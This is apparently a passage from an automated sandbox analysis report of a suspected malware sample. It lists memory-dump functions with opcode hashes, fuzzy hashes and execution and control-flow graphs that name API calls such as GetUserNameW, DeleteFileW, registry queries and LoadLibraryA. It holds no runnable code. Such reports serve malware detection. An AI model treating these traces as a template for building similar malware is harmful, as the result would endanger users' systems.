                                                              • Instruction ID: 8106bfc2cea8b8b3a5f7aacf1b876eb03cff129c8ef92d8daf79e5f25d9672ee
                                                              • Opcode Fuzzy Hash: 1d06d63ef487855327f4a4cab10702e0f791ab56fcb3a2c6d885b5d5f4911429
                                                              • Instruction Fuzzy Hash: 8AF0C92060F7D18FDB57973849206253F325AA3114B5E42EB8491CF6E3DA2C4849C367
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027D02B4 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 23d80666a2f0ab376c78d716d8fbc905bd1ff319e1b9465a6c4f2af63307246d
                                                              • Instruction ID: 10151f6affd3300b4f1b3763b6edebd93fbc68a3ae2f04c2add36f834109d89e
                                                              • Opcode Fuzzy Hash: 23d80666a2f0ab376c78d716d8fbc905bd1ff319e1b9465a6c4f2af63307246d
                                                              • Instruction Fuzzy Hash: 58E0B69970E3D10FE7535A3428642A57FB14A67550B0A10E7C4D4CB2E7D958890EC762
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027D06A0 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b72ad92a852f8b35c35b491e740ceee09fd786d57ab15facd78aa5c287fbdb10
                                                              • Instruction ID: e0a8e3b22eb2b44af3ae8b72b2ec864bd43530dc0c98d6fa81509b6fdac92481
                                                              • Opcode Fuzzy Hash: b72ad92a852f8b35c35b491e740ceee09fd786d57ab15facd78aa5c287fbdb10
                                                              • Instruction Fuzzy Hash: 91E0C239F005358B4718DA4E8510556BBAAAFC922071CA0B5E90DCB732DE30DC008781
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027D0A0F Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e97a09f1ccb403504892dc24c664b143787826f5cc2947c1983528b17338080c
                                                              • Instruction ID: 5c857761adc42018e6172e668746bdbeebed5fdd50a101ce1705831bdcbe3a0c
                                                              • Opcode Fuzzy Hash: e97a09f1ccb403504892dc24c664b143787826f5cc2947c1983528b17338080c
                                                              • Instruction Fuzzy Hash: 23E0EC6064E3C04FDB474B705C246A47F715D8721071E00EAD0C6CF2A3DD694455D72A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027D07E8 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f7106893537e588586e6323c4e3e4961062417cdf9b51ce35cd4941c78516b7
                                                              • Instruction ID: 74fdfd9dceacf889b1c9791dce8c5b7a3b0d5e362752e2d0f497e9a29c52e0ed
                                                              • Opcode Fuzzy Hash: 0f7106893537e588586e6323c4e3e4961062417cdf9b51ce35cd4941c78516b7
                                                              • Instruction Fuzzy Hash: C7D05E34F44509CF5B548629C51282977F66FC52287185064D1068FB20EF30E8408682
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027D10E3 Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05e78bc037c8a9896c7e50de28e0c71cf58caf196befabdb251ea820ee94b853
                                                              • Instruction ID: e60ce73401a4b2deb502805682e7eddbaedab70a5be3aecc354610613da1ac87
                                                              • Opcode Fuzzy Hash: 05e78bc037c8a9896c7e50de28e0c71cf58caf196befabdb251ea820ee94b853
                                                              • Instruction Fuzzy Hash: 46D0C734B042528A5B196565455117A33637BD31153FD40BA84065EF55CE369842E256
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027D07E3 Relevance: .0, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d92bed0078d6cb1700753df90ba9be0c767a045d8a790ef89fcd82ff2a5d4ad
                                                              • Instruction ID: 87902e377b526a6ff93fa40c02a1bd30a5d042e7c76538e852aff6465f582d23
                                                              • Opcode Fuzzy Hash: 1d92bed0078d6cb1700753df90ba9be0c767a045d8a790ef89fcd82ff2a5d4ad
                                                              • Instruction Fuzzy Hash: 32D0A734F88945CFDB14C629C052C287FB27F86214B1850ADE446DBA31D7319400CB01
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027D094B Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 850c4b7070b106010cbeab75b1b0df1d78d14d1a6672e2f93ff262af4032b9b9
                                                              • Instruction ID: 1c4a4609ce08a3ccb5963d29881a55d137eb329ba2768741592514ee5fbc96a5
                                                              • Opcode Fuzzy Hash: 850c4b7070b106010cbeab75b1b0df1d78d14d1a6672e2f93ff262af4032b9b9
                                                              • Instruction Fuzzy Hash: EAB01230144B4C9FA781735434456D47F0CD407400B8900C0F08C83511CE90944249E6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027D0950 Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1cbfe5e27f7508562575549767d8b41676e009bf0f2911160458435bc540e2b2
                                                              • Instruction ID: 6964ae809d27c337135a50f52d506a8297f2196f439e5b4016065098d92b979f
                                                              • Opcode Fuzzy Hash: 1cbfe5e27f7508562575549767d8b41676e009bf0f2911160458435bc540e2b2
                                                              • Instruction Fuzzy Hash: 4C90223000030C8B8200B38038083803B0CA008000B800000B00C802008EE0A00000A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 04EC57A0 Relevance: 4.5, Instructions: 4484COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380799620.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ec0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e6f606cce7badbc81721e09353d0dc221350042136e97d74c39c3ee770d8da2
                                                              • Instruction ID: 9544eb5c89333b392d49bcf5a2ecf5e26ca653ba783d3bb7e738958fce410084
                                                              • Opcode Fuzzy Hash: 6e6f606cce7badbc81721e09353d0dc221350042136e97d74c39c3ee770d8da2
                                                              • Instruction Fuzzy Hash: 61A35D70E441288FC759EF29E9856ACBBB2FB49301F0045EAD48CA7755DB386E88CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04EF0040 Relevance: 4.4, Instructions: 4368COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380992110.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ef0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e21ec41e4180750a5525093fa97d1ccae2169fda16ad32f24b9a446e7fd1f47a
                                                              • Instruction ID: 1fdf458a824db358b78d6654b763fb723c9c79ffb4367caf9c42b25f36d6da4a
                                                              • Opcode Fuzzy Hash: e21ec41e4180750a5525093fa97d1ccae2169fda16ad32f24b9a446e7fd1f47a
                                                              • Instruction Fuzzy Hash: 9B934E70E042288FCB19EF29D9856ADBBB2FB89305F0045E9D48CA7755DB346E88CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:31.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:4.3%
                                                              Total number of Nodes:163
                                                              Total number of Limit Nodes:9
                                                              execution_graph 59907 4f00850 59910 4f0085d 59907->59910 59908 4f00869 59909 4f0086f 59908->59909 59929 9ee6058 59908->59929 59935 9ee6018 59908->59935 59915 4f01bf0 59910->59915 59923 4f01ca4 59910->59923 59916 4f01c1b 59915->59916 59917 4f01c5f 59915->59917 59941 9ee533f 59916->59941 59946 9ee5340 59916->59946 59920 4f01c93 59917->59920 59951 9ee5678 59917->59951 59956 9ee5667 59917->59956 59920->59908 59924 4f01cb2 59923->59924 59925 4f01c62 59923->59925 59926 4f01c93 59925->59926 59927 9ee5678 GetUserNameW 59925->59927 59928 9ee5667 GetUserNameW 59925->59928 59926->59908 59927->59926 59928->59926 59930 9ee6078 59929->59930 59967 9ee648a 59930->59967 59971 9ee64c9 59930->59971 59975 9ee62e8 59930->59975 59931 9ee60df 59931->59909 59936 9ee601d 59935->59936 59938 9ee648a DeleteFileW 59936->59938 59939 9ee62e8 DeleteFileW 59936->59939 59940 9ee64c9 DeleteFileW 59936->59940 59937 9ee60df 59937->59909 59938->59937 59939->59937 59940->59937 59942 9ee5358 59941->59942 59945 9ee53b7 59942->59945 59961 9ee4ecc 59942->59961 59945->59917 59947 9ee5358 59946->59947 59948 9ee4ecc GetUserNameW 59947->59948 59950 9ee53b7 59947->59950 59949 9ee53a9 59948->59949 59949->59917 59950->59917 59952 9ee5686 59951->59952 59953 9ee56a9 59951->59953 59952->59920 59955 9ee5728 59953->59955 59965 9ee4ee4 GetUserNameW 59953->59965 59955->59920 59957 9ee5686 59956->59957 59958 9ee56a9 59956->59958 59957->59920 59960 9ee5728 59958->59960 59966 9ee4ee4 GetUserNameW 59958->59966 59960->59920 59963 9ee5478 59961->59963 59962 9ee5588 GetUserNameW 59964 9ee55c5 59962->59964 59963->59962 59963->59963 59969 9ee6491 59967->59969 59968 9ee65ee 59968->59931 59979 9ee66e0 59969->59979 59972 9ee64d0 59971->59972 59974 9ee66e0 DeleteFileW 59972->59974 59973 9ee65ee 59973->59931 59974->59973 59976 9ee65ee 59975->59976 59977 9ee631c 59975->59977 59976->59931 59977->59976 59978 9ee66e0 DeleteFileW 59977->59978 59978->59976 59980 9ee66ee 59979->59980 59981 9ee6711 59979->59981 59980->59968 59982 9ee6765 59981->59982 59984 9ee5e74 59981->59984 59982->59968 59985 9ee67d8 DeleteFileW 59984->59985 59987 9ee6857 59985->59987 59987->59982 59988 4f0add0 59989 4f0adee 59988->59989 59992 4f09dc0 59989->59992 59991 4f0ae25 59993 4f0c8f0 LoadLibraryA 59992->59993 59995 4f0c9cc 59993->59995 59857 9ee7aa9 59858 9ee7aba 59857->59858 59866 a276008 59858->59866 59873 a276068 59858->59873 59859 9ee7b0e 59860 9ee7e02 KiUserExceptionDispatcher 59859->59860 59861 9ee7e1e 59860->59861 59862 9ee8718 KiUserExceptionDispatcher 59861->59862 59863 9ee8737 59862->59863 59868 a276023 59866->59868 59867 a276029 59867->59859 59868->59867 59869 a2765d9 RegQueryValueExW 59868->59869 59870 a276638 RegQueryValueExW 59868->59870 59880 a276380 59868->59880 59884 a276321 59868->59884 59869->59868 59870->59868 59875 a276087 59873->59875 59874 a2762f1 59874->59859 59875->59874 59876 a2765d9 RegQueryValueExW 59875->59876 59877 a276638 RegQueryValueExW 59875->59877 59878 a276321 RegOpenKeyExW 59875->59878 59879 a276380 RegOpenKeyExW 59875->59879 59876->59875 59877->59875 59878->59875 59879->59875 59881 a2763d2 RegOpenKeyExW 59880->59881 59883 a276446 59881->59883 59885 a276364 RegOpenKeyExW 59884->59885 59886 a276341 59884->59886 59888 a276446 59885->59888 59886->59868 59898 a276568 59899 a27656d 59898->59899 59903 a2764c1 RegCloseKey 59899->59903 59905 a2764c8 RegCloseKey 59899->59905 59900 a27658d 59904 a27652c 59903->59904 59904->59900 59906 a27652c 59905->59906 59906->59900 60014 4f04540 60015 4f04554 60014->60015 60018 4f0478a 60015->60018 60016 4f0455d 60019 4f04793 60018->60019 60024 4f04870 60018->60024 60029 4f0485f 60018->60029 60034 4f0496c 60018->60034 60039 4f04986 60018->60039 60019->60016 60025 4f048b4 60024->60025 60026 4f049ab 60025->60026 60044 4f04c67 60025->60044 60049 4f04c78 60025->60049 60030 4f048b4 60029->60030 60031 4f049ab 60030->60031 60032 4f04c67 2 API calls 60030->60032 60033 4f04c78 2 API calls 60030->60033 60032->60031 60033->60031 60035 4f0491f 60034->60035 60036 4f049ab 60035->60036 60037 4f04c67 2 API calls 60035->60037 60038 4f04c78 2 API calls 60035->60038 60036->60036 60037->60036 60038->60036 60040 4f04999 60039->60040 60041 4f049ab 60039->60041 60042 4f04c67 2 API calls 60040->60042 60043 4f04c78 2 API calls 60040->60043 60041->60041 60042->60041 60043->60041 60045 4f04c86 60044->60045 60054 4f04cb8 60045->60054 60058 4f04cc8 60045->60058 60046 4f04c96 60046->60026 60050 4f04c86 60049->60050 60052 4f04cc8 RtlEncodePointer 60050->60052 60053 4f04cb8 RtlEncodePointer 60050->60053 60051 4f04c96 60051->60026 60052->60051 60053->60051 60055 4f04d02 60054->60055 60056 4f04d55 60055->60056 60057 4f04d2c RtlEncodePointer 60055->60057 60056->60046 60057->60056 60059 4f04d02 60058->60059 60060 4f04d2c RtlEncodePointer 60059->60060 60061 4f04d55 60059->60061 60060->60061 60061->60046 60062 9ee7b1f 60063 9ee7b30 60062->60063 60064 9ee7e02 KiUserExceptionDispatcher 60063->60064 60065 9ee7e1e 60064->60065 60066 9ee8718 KiUserExceptionDispatcher 60065->60066 60067 9ee8737 60066->60067 60096 9ee8595 60097 9ee85a6 60096->60097 60098 9ee8718 KiUserExceptionDispatcher 60097->60098 60099 9ee8737 60098->60099 60106 9ee7a92 60107 9ee7a98 60106->60107 60113 a276008 4 API calls 60107->60113 60114 a276068 4 API calls 60107->60114 60108 9ee7b0e 60109 9ee7e02 KiUserExceptionDispatcher 60108->60109 60110 9ee7e1e 60109->60110 60111 9ee8718 KiUserExceptionDispatcher 60110->60111 60112 9ee8737 60111->60112 60113->60108 60114->60108 60121 a3f3ac0 60122 a3f3adf LdrInitializeThunk 60121->60122 60124 a3f3b32 60122->60124

                                                              Executed Functions

                                                              Function 0A3F3AC0 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.548516227.000000000A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A3F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a3f0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4be23331a25445450168c685196d6abd278ee52b15a4ed8a031f268dc805940a
                                                              • Instruction ID: d58a642c38fd74be8b87ba7a491bee976125243c439c4afa72eeebadd7a61836
                                                              • Opcode Fuzzy Hash: 4be23331a25445450168c685196d6abd278ee52b15a4ed8a031f268dc805940a
                                                              • Instruction Fuzzy Hash: F451AF70A002099FCB04EFB0D959AAEB7E5FF85304F048969E6129B391DF34ED05CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE4ECC Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 09EE55B3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 2f361984e5b74b9c09e0a482c5de1e076561dbc7a593a5785181f191861e0529
                                                              • Instruction ID: aca9ef358297408d6e5a24240f3fc77fd4d2f66bd15dbd8c73dd1d773753c37b
                                                              • Opcode Fuzzy Hash: 2f361984e5b74b9c09e0a482c5de1e076561dbc7a593a5785181f191861e0529
                                                              • Instruction Fuzzy Hash: F1511370D002188FDF14CFA9C889BEDBBB1BF49318F158519E816AB390DB749848CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7AA9 Relevance: 3.3, APIs: 2, Instructions: 343COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1991 9ee7aa9-9ee7b08 call 9ee5a68 call 9ee5bf8 2205 9ee7b08 call a276008 1991->2205 2206 9ee7b08 call a276068 1991->2206 2000 9ee7b0e-9ee7b43 2207 9ee7b43 call a276dc4 2000->2207 2208 9ee7b43 call a276d70 2000->2208 2209 9ee7b43 call a276acc 2000->2209 2210 9ee7b43 call a276ad8 2000->2210 2003 9ee7b49-9ee7b75 2137 9ee7b75 call 4f0fc98 2003->2137 2138 9ee7b75 call 4f0fc88 2003->2138 2139 9ee7b75 call 4f0fcf9 2003->2139 2006 9ee7b7b-9ee7bb0 2143 9ee7bb0 call a3f07ee 2006->2143 2144 9ee7bb0 call a3f0006 2006->2144 2145 9ee7bb0 call a3f0be0 2006->2145 2146 9ee7bb0 call a3f0040 2006->2146 2147 9ee7bb0 call a3f0740 2006->2147 2009 9ee7bb6-9ee7bec 2160 9ee7bec call a3f07ee 2009->2160 2161 9ee7bec call a3f1038 2009->2161 2162 9ee7bec call a3f0006 2009->2162 2163 9ee7bec call a3f0be0 2009->2163 2164 9ee7bec call a3f0040 2009->2164 2165 9ee7bec call a3f0740 2009->2165 2012 9ee7bf2-9ee7cb2 2179 9ee7cb2 call a3f202e 2012->2179 2180 9ee7cb2 call a3f2090 2012->2180 2021 9ee7cb8-9ee7d33 2182 9ee7d33 call a3f3208 2021->2182 2183 9ee7d33 call a3f32a8 2021->2183 2184 9ee7d33 call a3f3158 2021->2184 2185 9ee7d33 call a3f3307 2021->2185 2027 9ee7d39-9ee7d78 2194 9ee7d78 call a3f3369 2027->2194 2195 9ee7d78 call a3f33c8 2027->2195 2030 9ee7d7e-9ee7dbd 2196 9ee7dbd call a3f39ff 2030->2196 2197 9ee7dbd call a3f3691 2030->2197 2198 9ee7dbd call a3f3900 2030->2198 2033 9ee7dc3-9ee7e5d KiUserExceptionDispatcher 2202 9ee7e5d call a3f3ecf 2033->2202 2203 9ee7e5d call a3f3fdf 2033->2203 2204 9ee7e5d call a3f3f80 2033->2204 2039 9ee7e63-9ee7f2c 2152 9ee7f2c call a3f4279 2039->2152 2153 9ee7f2c call a3f4679 2039->2153 2154 9ee7f2c call a3f4288 2039->2154 2155 9ee7f2c call a3f4651 2039->2155 2156 9ee7f2c call a3f4320 2039->2156 2048 9ee7f32-9ee7f71 2157 9ee7f71 call a3f5ef8 2048->2157 2158 9ee7f71 call a3f5ee8 2048->2158 2159 9ee7f71 call a3f5f57 2048->2159 2051 9ee7f77-9ee7ffb 2174 9ee7ffb call a3f62ef 2051->2174 2175 9ee7ffb call a3f623c 2051->2175 2176 9ee7ffb call a3f6290 2051->2176 2057 9ee8001-9ee80c1 2188 9ee80c1 call a3f6be8 2057->2188 2189 9ee80c1 call a3f6d38 2057->2189 2190 9ee80c1 call a3f6d97 2057->2190 2066 9ee80c7-9ee8106 2191 9ee8106 call a3f6df9 2066->2191 2192 9ee8106 call a3f6e58 2066->2192 2193 9ee8106 call a3f6eb7 2066->2193 2069 9ee810c-9ee814b 2199 9ee814b call a3f6f18 2069->2199 2200 9ee814b call a3f6f78 2069->2200 2201 9ee814b call a3f6fd7 2069->2201 2072 9ee8151-9ee8268 2140 9ee8268 call a3f8149 2072->2140 2141 9ee8268 call a3f8158 2072->2141 2142 9ee8268 call a3f80b0 2072->2142 2084 9ee826e-9ee82b0 2148 9ee82b0 call a3f887f 2084->2148 2149 9ee82b0 call a3f83f8 2084->2149 2150 9ee82b0 call a3f85b8 2084->2150 2151 9ee82b0 call a3f8820 2084->2151 2087 9ee82b6-9ee82f8 2166 9ee82f8 call a3f88e0 2087->2166 2167 9ee82f8 call a3f8940 2087->2167 2090 9ee82fe-9ee8340 2168 9ee8340 call a3f8b7f 2090->2168 2169 9ee8340 call a3f8e1c 2090->2169 2170 9ee8340 call a3f8f18 2090->2170 2171 9ee8340 call a3f8f77 2090->2171 2172 9ee8340 call a3f88e0 2090->2172 2173 9ee8340 call a3f8940 2090->2173 2093 9ee8346-9ee8388 2177 9ee8388 call a3f9038 2093->2177 2178 9ee8388 call a3f9030 2093->2178 2096 9ee838e-9ee8454 call a3fa578 2186 9ee8454 call a3fba28 2096->2186 2187 9ee8454 call a3fb892 2096->2187 2105 9ee845a-9ee8730 KiUserExceptionDispatcher 2135 9ee8737-9ee876d 2105->2135 2137->2006 2138->2006 2139->2006 2140->2084 2141->2084 2142->2084 2143->2009 2144->2009 2145->2009 2146->2009 2147->2009 2148->2087 2149->2087 2150->2087 2151->2087 2152->2048 2153->2048 2154->2048 2155->2048 2156->2048 2157->2051 2158->2051 2159->2051 2160->2012 2161->2012 2162->2012 2163->2012 2164->2012 2165->2012 2166->2090 2167->2090 2168->2093 2169->2093 2170->2093 2171->2093 2172->2093 2173->2093 2174->2057 2175->2057 2176->2057 2177->2096 2178->2096 2179->2021 2180->2021 2182->2027 2183->2027 2184->2027 2185->2027 2186->2105 2187->2105 2188->2066 2189->2066 2190->2066 2191->2069 2192->2069 2193->2069 2194->2030 2195->2030 2196->2033 2197->2033 2198->2033 2199->2072 2200->2072 2201->2072 2202->2039 2203->2039 2204->2039 2205->2000 2206->2000 2207->2003 2208->2003 2209->2003 2210->2003
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: d6ffb0f3ada26dcc80d8032266ad28c9d786c56957ae88969e77dd109a50c0af
                                                              • Instruction ID: 8be38a4699b138f9e3586aa2dcbccfe29f07dee5b257c0d51b9a2a221cbaabd9
                                                              • Opcode Fuzzy Hash: d6ffb0f3ada26dcc80d8032266ad28c9d786c56957ae88969e77dd109a50c0af
                                                              • Instruction Fuzzy Hash: 7902DB7490A298CFCB66DF74E8886E9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7A92 Relevance: 3.3, APIs: 2, Instructions: 342COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2211 9ee7a92-9ee7b08 2378 9ee7b08 call a276008 2211->2378 2379 9ee7b08 call a276068 2211->2379 2218 9ee7b0e-9ee7b43 2380 9ee7b43 call a276dc4 2218->2380 2381 9ee7b43 call a276d70 2218->2381 2382 9ee7b43 call a276acc 2218->2382 2383 9ee7b43 call a276ad8 2218->2383 2221 9ee7b49-9ee7b75 2384 9ee7b75 call 4f0fc98 2221->2384 2385 9ee7b75 call 4f0fc88 2221->2385 2386 9ee7b75 call 4f0fcf9 2221->2386 2224 9ee7b7b-9ee7bb0 2390 9ee7bb0 call a3f07ee 2224->2390 2391 9ee7bb0 call a3f0006 2224->2391 2392 9ee7bb0 call a3f0be0 2224->2392 2393 9ee7bb0 call a3f0040 2224->2393 2394 9ee7bb0 call a3f0740 2224->2394 2227 9ee7bb6-9ee7bec 2407 9ee7bec call a3f07ee 2227->2407 2408 9ee7bec call a3f1038 2227->2408 2409 9ee7bec call a3f0006 2227->2409 2410 9ee7bec call a3f0be0 2227->2410 2411 9ee7bec call a3f0040 2227->2411 2412 9ee7bec call a3f0740 2227->2412 2230 9ee7bf2-9ee7cb2 2426 9ee7cb2 call a3f202e 2230->2426 2427 9ee7cb2 call a3f2090 2230->2427 2239 9ee7cb8-9ee7d33 2355 9ee7d33 call a3f3208 2239->2355 2356 9ee7d33 call a3f32a8 2239->2356 2357 9ee7d33 call a3f3158 2239->2357 2358 9ee7d33 call a3f3307 2239->2358 2245 9ee7d39-9ee7d78 2367 9ee7d78 call a3f3369 2245->2367 2368 9ee7d78 call a3f33c8 2245->2368 2248 9ee7d7e-9ee7dbd 2369 9ee7dbd call a3f39ff 2248->2369 2370 9ee7dbd call a3f3691 2248->2370 2371 9ee7dbd call a3f3900 2248->2371 2251 9ee7dc3-9ee7e5d KiUserExceptionDispatcher 2375 9ee7e5d call a3f3ecf 2251->2375 2376 9ee7e5d call a3f3fdf 2251->2376 2377 9ee7e5d call a3f3f80 2251->2377 2257 9ee7e63-9ee7f2c 2399 9ee7f2c call a3f4279 2257->2399 2400 9ee7f2c call a3f4679 2257->2400 2401 9ee7f2c call a3f4288 2257->2401 2402 9ee7f2c call a3f4651 2257->2402 2403 9ee7f2c call a3f4320 2257->2403 2266 9ee7f32-9ee7f71 2404 9ee7f71 call a3f5ef8 2266->2404 2405 9ee7f71 call a3f5ee8 2266->2405 2406 9ee7f71 call a3f5f57 2266->2406 2269 9ee7f77-9ee7ffb 2421 9ee7ffb call a3f62ef 2269->2421 2422 9ee7ffb call a3f623c 2269->2422 2423 9ee7ffb call a3f6290 2269->2423 2275 9ee8001-9ee80c1 2361 9ee80c1 call a3f6be8 2275->2361 2362 9ee80c1 call a3f6d38 2275->2362 2363 9ee80c1 call a3f6d97 2275->2363 2284 9ee80c7-9ee8106 2364 9ee8106 call a3f6df9 2284->2364 2365 9ee8106 call a3f6e58 2284->2365 2366 9ee8106 call a3f6eb7 2284->2366 2287 9ee810c-9ee814b 2372 9ee814b call a3f6f18 2287->2372 2373 9ee814b call a3f6f78 2287->2373 2374 9ee814b call a3f6fd7 2287->2374 2290 9ee8151-9ee8268 2387 9ee8268 call a3f8149 2290->2387 2388 9ee8268 call a3f8158 2290->2388 2389 9ee8268 call a3f80b0 2290->2389 2302 9ee826e-9ee82b0 2395 9ee82b0 call a3f887f 2302->2395 2396 9ee82b0 call a3f83f8 2302->2396 2397 9ee82b0 call a3f85b8 2302->2397 2398 9ee82b0 call a3f8820 2302->2398 2305 9ee82b6-9ee82f8 2413 9ee82f8 call a3f88e0 2305->2413 2414 9ee82f8 call a3f8940 2305->2414 2308 9ee82fe-9ee8340 2415 9ee8340 call a3f8b7f 2308->2415 2416 9ee8340 call a3f8e1c 2308->2416 2417 9ee8340 call a3f8f18 2308->2417 2418 9ee8340 call a3f8f77 2308->2418 2419 9ee8340 call a3f88e0 2308->2419 2420 9ee8340 call a3f8940 2308->2420 2311 9ee8346-9ee8388 2424 9ee8388 call a3f9038 2311->2424 2425 9ee8388 call a3f9030 2311->2425 2314 9ee838e-9ee8454 call a3fa578 2359 9ee8454 call a3fba28 2314->2359 2360 9ee8454 call a3fb892 2314->2360 2323 9ee845a-9ee8730 KiUserExceptionDispatcher 2353 9ee8737-9ee876d 2323->2353 